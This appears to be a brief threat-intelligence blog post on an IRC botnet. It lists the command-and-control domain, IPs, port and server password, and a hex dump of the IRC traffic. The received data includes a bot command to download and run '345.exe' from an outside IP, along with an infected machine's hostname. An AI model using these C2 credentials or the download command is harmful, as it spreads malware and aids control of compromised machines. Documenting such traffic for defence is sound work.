a.bestplay2010.com(botnet hosted in Russian Federation Vline Ltd)

a.bestplay2010.com DNS_TYPE_A IP’s 109.196.142.66 109.196.142.58
port:5901

109.196.142.66:5901 PASS eee

Data sent:

4b43 494b 2063 796d 7271 666a 6f0d 0a72 KCIK cymrqfjo..r
7373 7220 6d67 7670 6f79 6f79 2022 2220 ssr mgvpoyoy “”
2265 736d 2220 3a6d 6776 706f 796f 790d “esm” :mgvpoyoy.
0a .
Data received:

3a49 5243 2149 5243 4068 7562 2e75 732e :IRC!IRC@hub.us.
636f 6d20 5052 4956 4d53 4720 6379 6d72 com PRIVMSG cymr
7166 6a6f 203a 0156 4552 5349 4f4e 010d qfjo :.VERSION..
0a3a 6875 622e 7573 2e63 6f6d 2030 3031 .:hub.us.com 001
2063 796d 7271 666a 6f20 3a75 732c 2063 cymrqfjo :us, c
796d 7271 666a 6f21 6d67 7670 6f79 6f79 ymrqfjo!mgvpoyoy
404c 526f 7565 6e2d 3135 322d 3833 2d31 @LRouen-152-83-1
322d 3231 2e77 3830 2d31 332e 6162 6f2e 2-21.w80-13.abo.
7761 6e61 646f 6f2e 6672 0d0a 3a0d 0a3a wanadoo.fr..:..:
6875 622e 7573 2e63 6f6d 2030 3035 2063 hub.us.com 005 c
796d 7271 666a 6f20 0d0a 3a63 796d 7271 ymrqfjo ..:cymrq
666a 6f21 6d67 7670 6f79 6f79 404c 526f fjo!mgvpoyoy@LRo
7565 6e2d 3135 322d 3833 2d31 322d 3231 uen-152-83-12-21
2e77 3830 2d31 332e 6162 6f2e 7761 6e61 .w80-13.abo.wana
646f 6f2e 6672 204a 4f49 4e20 3a23 6470 doo.fr JOIN :#dp
690d 0a3a 6875 622e 7573 2e63 6f6d 2033 i..:hub.us.com 3
3332 2063 796d 7271 666a 6f20 2364 7069 32 cymrqfjo #dpi
203a 2164 6c20 6874 7470 3a2f 2f39 312e :!dl http://91.
3231 372e 3136 322e 3830 2f33 3435 2e65 217.162.80/345.e
7865 2070 662e 6578 6520 3120 2d73 0d0a xe pf.exe 1 -s..
3a68 7562 2e75 732e 636f 6d20 3333 3320 :hub.us.com 333
6379 6d72 7166 6a6f 2023 6470 6920 6d69 cymrqfjo #dpi mi
6e64 6572 3932 2031 3239 3533 3537 3432 nder92 129535742
360d 0a3a 6875 622e 7573 2e63 6f6d 2033 6..:hub.us.com 3
3533 2063 796d 7271 666a 6f20 4020 2364 53 cymrqfjo @ #d
7069 203a 6379 6d72 7166 6a6f 200d 0a1f pi :cymrqfjo …

infos about hosting:
http://whois.domaintools.com/109.196.142.66

Categories: Uncategorized